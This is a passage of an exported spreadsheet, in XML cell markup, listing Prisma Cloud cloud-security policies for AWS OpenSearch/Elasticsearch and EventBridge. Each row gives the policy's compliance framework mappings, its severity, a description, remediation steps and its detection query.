          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v3.0.1, APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, CSA CCM v3.0.1, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), ISO 27002:2022, Risk Management in Technology (RMiT), CSA CCM v3.0.1, Australian Energy Sector Cyber Security Framework (AESCSF), CSA CCM v3.0.1, ISO/IEC 27002:2013, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, NIST SP 800-171 Revision 3, PCI DSS v4.0, CSA CCM v.4.0.1, CSA CCM v3.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CSA CCM v3.0.1, ISO/IEC 27017:2015, CSA CCM v3.0.1, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, CIS Controls v8.1, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Telecommunications Security Act - TSA, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST 800-53 Rev 5, MAS TRM 2021, PCI DSS v4.0, HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], NIST SP 800-172, CSA CCM v3.0.1, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 1, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], CHC HITRUST CSF v.9.6.0, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, CyberSecurity Law of the People's Republic of China, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, NIST 800-171 Rev1, FFIEC, CSA CCM v.4.0.1, SOC 2, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), MLPS 2.0, CHC HITRUST CSF v.9.6.0, Insurance Regulatory And Development Authority Of India, NIST 800-53 Rev4, CRI Profile v1.2.1, HITRUST CSF v.11.2.0, CRI Profile v2.0, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, SOC 2, PCI DSS v4.0, SOC 2, NIST CSF v2.0, ITSG-33, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, CSA CCM v3.0.1, MLPS 2.0 (Level 3), NIST CSF, GDPR, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Fedramp (Moderate), CRI Profile v1.2.1, CSA CCM v.4.0.6, CRI Profile v2.0, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, CSA CCM v3.0.1, FFIEC, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, DORA, CSA CCM v.4.0.6, HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, DORA, NIST 800-171 Rev1, Copy of ACSC Information Security Manual (ISM)-clone, TX-RAMP Level 2, CSA CCM v3.0.1, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CHC HITRUST CSF v.9.6.0, NIST CSF v2.0, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B1930" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1930" s="2" t="inlineStr"/>
      <c r="D1930" t="inlineStr"/>
      <c r="E1930" t="inlineStr"/>
      <c r="F1930" t="inlineStr"/>
      <c r="G1930" t="b">
        <v>0</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1930" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1930" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain has Search slow logs set to disabled</t>
        </is>
      </c>
      <c r="L1930" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1930" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1930" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1930" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1930" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1930" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R1930" t="inlineStr">
        <is>
          <t>09.aa</t>
        </is>
      </c>
      <c r="S1930" t="inlineStr"/>
      <c r="T1930" t="b">
        <v>0</v>
      </c>
      <c r="U1930" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1930" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1930" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch domains for which Search slow logs is disabled in your AWS account. Enabling support for publishing Search slow logs to AWS CloudWatch Logs enables you to have full insight into the performance of search operations performed on your Elasticsearch clusters. This will help you in identifying performance issues caused by specific search queries so that you can optimize your queries to address the problem.</t>
        </is>
      </c>
      <c r="X1930" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to Elasticsearch Service Dashboard
4. Choose reported Elasticsearch domain
5. Select the 'Logs' tab
6. In 'Set up Search slow logs' section,
 a. click on 'Setup'
 b. In 'Select CloudWatch Logs log group' setting, Create/Use existing CloudWatch Logs log group as per your requirement
 c. In 'Specify CloudWatch access policy', Create new/Select an existing policy as per your requirement
 d. Click on 'Enable'
The search slow logs setting 'Status' should change now to 'Enabled'.</t>
        </is>
      </c>
      <c r="Y1930" t="inlineStr"/>
      <c r="Z1930" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = 'processing is false and (logPublishingOptions does not exist or logPublishingOptions.SEARCH_SLOW_LOGS.enabled is false or logPublishingOptions.SEARCH_SLOW_LOGS.cloudWatchLogsLogGroupArn is empty)'</t>
        </is>
      </c>
      <c r="AA1930" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1930" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1930" t="inlineStr">
        <is>
          <t>PC-AWS-ES-178</t>
        </is>
      </c>
      <c r="AD1930" t="b">
        <v>1</v>
      </c>
      <c r="AE1930" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1930" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
          <t>59c82c7e-2884-4c65-a307-eba3a6fc27d7</t>
        </is>
      </c>
      <c r="AI1930" t="inlineStr">
        <is>
          <t>e043e14d-6680-451c-8aa7-f0aa61b9cd87</t>
        </is>
      </c>
      <c r="AJ1930" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1930" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1931">
      <c r="A1931" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2022.2.1, MLPS 2.0 (Level 2), SOC 2, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, Sarbanes Oxley Act (SOX), NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1931" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1931" s="2" t="inlineStr"/>
      <c r="D1931" t="inlineStr"/>
      <c r="E1931" t="inlineStr"/>
      <c r="F1931" t="inlineStr"/>
      <c r="G1931" t="b">
        <v>1</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1931" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1931" t="inlineStr">
        <is>
          <t>AWS OpenSearch node-to-node encryption is disabled</t>
        </is>
      </c>
      <c r="L1931" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M1931" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1931" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1931" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1931" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1931" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R1931" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S1931" t="inlineStr"/>
      <c r="T1931" t="b">
        <v>0</v>
      </c>
      <c r="U1931" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1931" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1931" t="inlineStr">
        <is>
          <t>This policy identifies AWS OpenSearch for which none-to-node encryption is disabled. Each OpenSearch domain resides within a dedicated VPC and, by default, traffic within the VPC is unencrypted. Enabling node to node encryption provides additional security layer by making use of TLS encryption for all communications between Amazon OpenSearch Service instances in a cluster.
For more information, please follow the URL given below,
https://docs.aws.amazon.com/opensearch-service/latest/developerguide/ntn.html</t>
        </is>
      </c>
      <c r="X1931" t="inlineStr">
        <is>
          <t>Go to https://aws.amazon.com, and then choose Sign In to the Console
1. Under Analytics, choose Amazon OpenSearch Service
2. Choose your domain
3. Choose Actions, Edit security configuration
4. Under Encryption section, check Node-to-node encryption
5. Click Save changes button
For more details on node-to-node encryption for an Amazon OpenSearch Service Domain, follow below mentioned URL:
https://docs.aws.amazon.com/opensearch-service/latest/developerguide/ntn.html
Note: Node-to-node encryption is supported only from OpenSearch 6.0 or later. To upgrade older versions of AWS OpenSearch please refer to the URL given below,
https://docs.aws.amazon.com/opensearch-service/latest/developerguide/version-migration.html</t>
        </is>
      </c>
      <c r="Y1931" t="inlineStr"/>
      <c r="Z1931" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = processing is false and (nodeToNodeEncryptionOptions.enabled is false or nodeToNodeEncryptionOptions.enabled does not exist)</t>
        </is>
      </c>
      <c r="AA1931" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1931" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1931" t="inlineStr">
        <is>
          <t>PC-AWS-ES-800</t>
        </is>
      </c>
      <c r="AD1931" t="b">
        <v>1</v>
      </c>
      <c r="AE1931" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1931" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>f9ec9514-9a35-46d3-9eac-88c37734fc42</t>
        </is>
      </c>
      <c r="AI1931" t="inlineStr">
        <is>
          <t>2e660a3c-0d65-4d5e-a8dd-42a8fd630a9a</t>
        </is>
      </c>
      <c r="AJ1931" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1931" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1932">
      <c r="A1932" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, ITSG-33, SOC 2, TX-RAMP Level 2, TX-RAMP Level 1, TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B1932" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1932" s="2" t="inlineStr"/>
      <c r="D1932" t="inlineStr"/>
      <c r="E1932" t="inlineStr"/>
      <c r="F1932" t="inlineStr"/>
      <c r="G1932" t="b">
        <v>1</v>
      </c>
      <c r="H19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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1932" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1932" t="inlineStr">
        <is>
          <t>AWS OpenSearch domain does not have the latest service software version</t>
        </is>
      </c>
      <c r="L1932" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1932" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1932" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1932" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1932" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1932" t="inlineStr">
        <is>
          <t>SL</t>
        </is>
      </c>
      <c r="R1932" t="inlineStr">
        <is>
          <t>SI-03-00 : Malicious Code Protection</t>
        </is>
      </c>
      <c r="S1932" t="inlineStr"/>
      <c r="T1932" t="b">
        <v>0</v>
      </c>
      <c r="U1932" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1932" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1932" t="inlineStr">
        <is>
          <t>This policy identifies Amazon OpenSearch Service domains that have service software updates available but not installed for the domain.
Amazon OpenSearch Service is a managed solution for deploying, managing, and scaling OpenSearch clusters. Service software updates deliver the most recent platform fixes, enhancements, and features for the environment, ensuring domain security and availability. To minimize service disruption, it's advisable to schedule updates during periods of low domain traffic.
It is recommended to keep OpenSearch regularly updated to maintain system security, while also accessing the latest features and improvements.</t>
        </is>
      </c>
      <c r="X1932" t="inlineStr">
        <is>
          <t>To request a service software update for an Amazon OpenSearch Service, perform the following actions:
1. Sign in to the AWS Management Console
2. Select the region from the dropdown in the top right corner where the alert is generated
3. In the Navigation Panel on the left, under 'Analytics', select 'Amazon OpenSearch Service'
4. Select the reported domain name
5. Under 'Actions', under 'Service software update', click on 'Update' and select one of the following options:
a. Apply update now - Immediately schedules the action to happen in the current hour if there's capacity available. If capacity isn't available, we provide other available time slots to choose from
b. Schedule it in off-peak window - Only available if the off-peak window is enabled for the domain. Schedules the update to take place during the domain's configured off-peak window. There's no guarantee that the update will happen during the next immediate window. Depending on capacity, it might happen in subsequent days
c. Schedule for specific date and time - Schedules the update to take place at a specific date and time. If the time that you specify is unavailable for capacity reasons, you can select a different time slot
6. Choose 'Confirm'</t>
        </is>
      </c>
      <c r="Y1932" t="inlineStr"/>
      <c r="Z1932" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' and api.name= 'aws-es-describe-elasticsearch-domain' AND json.rule = serviceSoftwareOptions.updateAvailable exists and serviceSoftwareOptions.updateAvailable is true</t>
        </is>
      </c>
      <c r="AA1932" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1932" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1932" t="inlineStr">
        <is>
          <t>PC-AWS-ES-1166</t>
        </is>
      </c>
      <c r="AD1932" t="b">
        <v>1</v>
      </c>
      <c r="AE1932" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1932" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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2" t="inlineStr">
        <is>
          <t>d15a0d78-a2c1-46c4-926d-9390174554c1</t>
        </is>
      </c>
      <c r="AI1932" t="inlineStr">
        <is>
          <t>eb6eba68-755f-4ecf-b26a-91d88a4805a9</t>
        </is>
      </c>
      <c r="AJ1932" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1932" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1933">
      <c r="A1933" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, APRA (CPS 234) Information Security, SOC 2, HITRUST CSF v.9.6.0, NIST 800-53 Rev4, MAS TRM 2021, MAS TRM 2021, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v3.0.1, ISO/IEC 27017:2015, Copy of CIS Controls v8, Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, CHC HITRUST CSF v.9.6.0, SOC 2, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v3.0.1, APRA (CPS 234) Information Security, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v3.0.1, HITRUST v.9.4.2 [Deprecated], CSA CCM v3.0.1, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO/IEC 27002:2013, Brazilian Data Protection Law (LGPD), Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v.9.6.0, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1933" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1933" s="2" t="inlineStr"/>
      <c r="D1933" t="inlineStr"/>
      <c r="E1933" t="inlineStr"/>
      <c r="F1933" t="inlineStr"/>
      <c r="G1933" t="b">
        <v>0</v>
      </c>
      <c r="H19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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1933" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1933" t="inlineStr">
        <is>
          <t>AWS Elasticsearch domain has Zone Awareness set to disabled</t>
        </is>
      </c>
      <c r="L1933" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1933" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1933" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1933" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1933" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1933" t="inlineStr">
        <is>
          <t>Control Category: 10.0</t>
        </is>
      </c>
      <c r="R1933" t="inlineStr">
        <is>
          <t>10.k</t>
        </is>
      </c>
      <c r="S1933" t="inlineStr"/>
      <c r="T1933" t="b">
        <v>0</v>
      </c>
      <c r="U1933" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1933" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1933" t="inlineStr">
        <is>
          <t>This policy identifies Elasticsearch domains for which Zone Awareness is disabled in your AWS account. Enabling Zone Awareness (cross-zone replication) increases the availability by distributing your Elasticsearch data nodes across two availability zones available in the same AWS region. It also prevents data loss and minimizes downtime in the event of node or availability zone failure.</t>
        </is>
      </c>
      <c r="X1933" t="inlineStr">
        <is>
          <t>To enable Zone Awareness feature on existing Elasticsearch, following CLI can be used:
aws es update-elasticsearch-domain-config --domain-name &lt;DOMAINNAME&gt; --region &lt;REGION&gt; --elasticsearch-cluster-config ZoneAwarenessEnabled=true, ZoneAwarenessConfig={AvailabilityZoneCount=&lt;COUNT&gt;}
For more refer:
https://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains-multiaz.html</t>
        </is>
      </c>
      <c r="Y1933" t="inlineStr"/>
      <c r="Z1933" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = 'processing is false and (elasticsearchClusterConfig.zoneAwarenessEnabled is false or elasticsearchClusterConfig.zoneAwarenessEnabled does not exist)'</t>
        </is>
      </c>
      <c r="AA1933" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1933" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1933" t="inlineStr">
        <is>
          <t>PC-AWS-ES-176</t>
        </is>
      </c>
      <c r="AD1933" t="b">
        <v>1</v>
      </c>
      <c r="AE1933" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1933" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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3" t="inlineStr">
        <is>
          <t>17004d48-becd-4578-a3d6-f82054bc9239</t>
        </is>
      </c>
      <c r="AI1933" t="inlineStr">
        <is>
          <t>108d1101-6da1-43b4-96ec-a2f92c3362a3</t>
        </is>
      </c>
      <c r="AJ1933" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1933" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1934">
      <c r="A1934" t="inlineStr">
        <is>
          <t>ITSG-33, NYDFS 23 CRR-NY 500.0, Microsoft Cloud Security Benchmark v1, TX-RAMP Level 1, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, SOC 2, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, DORA</t>
        </is>
      </c>
      <c r="B1934" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1934" s="2" t="inlineStr"/>
      <c r="D1934" t="inlineStr"/>
      <c r="E1934" t="inlineStr"/>
      <c r="F1934" t="inlineStr"/>
      <c r="G1934" t="b">
        <v>1</v>
      </c>
      <c r="H19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934" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1934" t="inlineStr">
        <is>
          <t>aws-es</t>
        </is>
      </c>
      <c r="K1934" t="inlineStr">
        <is>
          <t>AWS Opensearch domain Error logging disabled</t>
        </is>
      </c>
      <c r="L1934" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1934" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1934" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1934" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1934" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1934" t="inlineStr">
        <is>
          <t>Chapter II</t>
        </is>
      </c>
      <c r="R1934" t="inlineStr">
        <is>
          <t>Article 10, Detection</t>
        </is>
      </c>
      <c r="S1934" t="inlineStr"/>
      <c r="T1934" t="b">
        <v>0</v>
      </c>
      <c r="U1934" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1934" t="inlineStr">
        <is>
          <t>aws-es-describe-elasticsearch-domain</t>
        </is>
      </c>
      <c r="W1934" t="inlineStr">
        <is>
          <t>This policy identifies AWS Opensearch domains with no error logging configuration.
Opensearch application logs contain information about errors and warnings raised during the operation of the service and can be useful for troubleshooting. Error logs from domains can aid in security assessments, access monitoring, and troubleshooting availability problems.
It is recommended to enable the AWS Opensearch domain with error logs, which will help in security audits and troubleshooting.</t>
        </is>
      </c>
      <c r="X1934" t="inlineStr">
        <is>
          <t>To enable the AWS Opensearch domain with error logs:
1. Sign into the AWS console and navigate to the Opensearch Service Dashboard
2. In the navigation pane, under 'Managed Clusters', select 'Domains'
2. Choose the reported Elasticsearch domain
3. On the Logs tab, select 'Error logs' and choose 'Enable'.
4. In the 'Set up error logs' section, in the 'Select log group from CloudWatch logs' setting, Create/Use existing CloudWatch Logs log group as per your requirement
5. In 'Specify CloudWatch access policy', create new/Select an existing policy as per your requirement
6. Click on 'Enable'</t>
        </is>
      </c>
      <c r="Y1934" t="inlineStr"/>
      <c r="Z1934" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-es-describe-elasticsearch-domain' AND json.rule = domainProcessingStatus equal ignore case active and (logPublishingOptions does not exist or logPublishingOptions.ES_APPLICATION_LOGS.enabled is false)</t>
        </is>
      </c>
      <c r="AA1934" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1934" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1934" t="inlineStr">
        <is>
          <t>PC-AWS-ES-1198</t>
        </is>
      </c>
      <c r="AD1934" t="b">
        <v>1</v>
      </c>
      <c r="AE1934" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1934" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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34" t="inlineStr">
        <is>
          <t>402ac861-8538-458d-9f08-415d566d9409</t>
        </is>
      </c>
      <c r="AI1934" t="inlineStr">
        <is>
          <t>aa2376aa-0d3e-4fc6-9de5-0fb4a67707a2</t>
        </is>
      </c>
      <c r="AJ1934" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1934" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1935">
      <c r="A1935" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0</t>
        </is>
      </c>
      <c r="B1935" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1935" s="2" t="inlineStr"/>
      <c r="D1935" t="inlineStr"/>
      <c r="E1935" t="inlineStr"/>
      <c r="F1935" t="inlineStr"/>
      <c r="G1935" t="b">
        <v>1</v>
      </c>
      <c r="H19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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1935" t="inlineStr">
        <is>
          <t>aws-events</t>
        </is>
      </c>
      <c r="K1935" t="inlineStr">
        <is>
          <t>AWS EventBridge event bus with no resource-based policy attached</t>
        </is>
      </c>
      <c r="L1935" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1935" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1935" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1935" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1935" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1935" t="inlineStr">
        <is>
          <t>Control Category: 11.0</t>
        </is>
      </c>
      <c r="R1935" t="inlineStr">
        <is>
          <t>11.a - Reporting Information Security Events</t>
        </is>
      </c>
      <c r="S1935" t="inlineStr"/>
      <c r="T1935" t="b">
        <v>0</v>
      </c>
      <c r="U1935" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1935" t="inlineStr">
        <is>
          <t>aws-events-eventbus</t>
        </is>
      </c>
      <c r="W1935" t="inlineStr">
        <is>
          <t>This policy identifies AWS EventBridge event buses with no resource-based policy attached.
AWS EventBridge is a serverless event bus service that enables businesses to quickly and easily integrate applications, services, and data across multiple cloud environments. By default, an EventBridge custom event bus lacks a resource-based policy associated with it, which allows principals in the account to access the event bus. 
It is recommended to attach a resource based policy to the event bus to limit access scope to fewer entities.</t>
        </is>
      </c>
      <c r="X1935" t="inlineStr">
        <is>
          <t>To attach a resource based policy to the event bus, please follow the below steps:
1. Log into the AWS console and navigate to the EventBridge dashboard
2. In the left navigation pane, choose 'Event buses'
3. Select the event bus reported
4. Under the 'Permissions' tab, click on 'Manage permissions'
5. Add the resource based policy JSON with permissions to grant on the event bus
6. Click on 'Update'.</t>
        </is>
      </c>
      <c r="Y1935" t="inlineStr"/>
      <c r="Z1935" t="inlineStr">
        <is>
